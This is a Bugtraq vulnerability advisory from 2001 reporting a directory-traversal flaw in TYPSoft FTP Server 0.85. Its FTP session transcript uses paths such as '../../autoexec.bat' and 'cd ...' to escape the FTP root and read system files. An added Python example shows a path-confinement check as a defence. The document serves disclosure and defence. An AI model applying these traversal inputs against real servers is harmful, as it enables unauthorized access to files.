Bugtraq mailing list archives
Vulnerability in TYPSoft FTP Server
From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:27:57 -0500
----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in TYPSoft FTP Server

    Overview

TYPSoft FTP Server v0.85 is an ftp server available from
http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
exists which allows a remote attacker to break out of the ftp root using
relative paths (ie: '...').

    Details

The following is an illustration of the problem:

    % ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220 TYPSoft FTP Server 0.85 ready...
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> pwd
    257 "/C:/directory/directory/" is current directory.
    ftp> get ../../autoexec.bat
    200 Port command successful.
    150 Opening data connection for ../../autoexec.bat.
    226 Transfer complete.
    ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
    ftp> cd ..
    501 CWD failed. No permission
    ftp> cd ...
    250 CWD command successful. "/C:/directory/directory/.../" is current directory.
    ftp> pwd
    257 "/C:/directory/directory/.../" is current directory.
    ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 Transfer complete.
    ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
    ftp>

    Solution

    Date: Sat, 24 Feb 2001 01:39:23 -0500
    Subject: Re: Vulnerability in TYPSoft FTP Server
    From: TYPSoft <typsoft () altern org>
    To: joetesta () hushmail com

    Hi

    I have tried to fix this problem. The test I have made seems to be OK.

    Thanks for the report

    Marc
    TYPSoft

Unfortunately, I do not have the resources to verify this fix at this
time. Thus, I urge users to proceed with caution.

    Vendor Status

TYPSoft was contacted via <typsoft () altern org> on Wednesday,
February 21, 2001.

    - Joe Testa  ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )
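
The transcript above shows "cd .." refused while "get ../../autoexec.bat" and "cd ..." are accepted, so the root check was evidently not applied uniformly to every command and path form. As an added example (not code from the advisory or from TYPSoft), here is one way a server can route every path argument through a single confinement check; the function names and the virtual "/" root layout are assumptions made for illustration.

```python
import os

class PathDenied(Exception):
    """Raised when a client-supplied path would leave the FTP root."""

def resolve_virtual(cwd: str, arg: str) -> str:
    """Resolve `arg` against the virtual directory `cwd` ("/" is the FTP root).

    Every command that takes a path (CWD, RETR, STOR, ...) should call this
    one function, so no command can skip the check.
    """
    arg = arg.replace("\\", "/")              # treat both separators alike
    if "\x00" in arg or ":" in arg:           # NUL bytes, drive letters, streams
        raise PathDenied("illegal character")
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:                     # would climb above the root
                raise PathDenied("above root")
            stack.pop()
        elif part.strip(". ") == "":
            # "...", "....", ". ." and similar: refuse instead of guessing
            # how the underlying filesystem will interpret the name
            raise PathDenied("dot-only component")
        else:
            stack.append(part)
    return "/" + "/".join(stack)

def to_local(root: str, vpath: str) -> str:
    """Map a resolved virtual path to disk and re-check containment."""
    real_root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(real_root, vpath.lstrip("/")))
    if os.path.commonpath([real_root, full]) != real_root:
        raise PathDenied("resolved outside root")
    return full

def allowed(cwd: str, arg: str) -> bool:
    """True if `arg` stays inside the root when issued from `cwd`."""
    try:
        resolve_virtual(cwd, arg)
        return True
    except PathDenied:
        return False

if __name__ == "__main__":
    # Constructed inputs mirroring the commands in the transcript
    for arg in ("../../autoexec.bat", "..", "...", "sub/../file.txt"):
        print(repr(arg), "->", "ok" if allowed("/", arg) else "denied")
```
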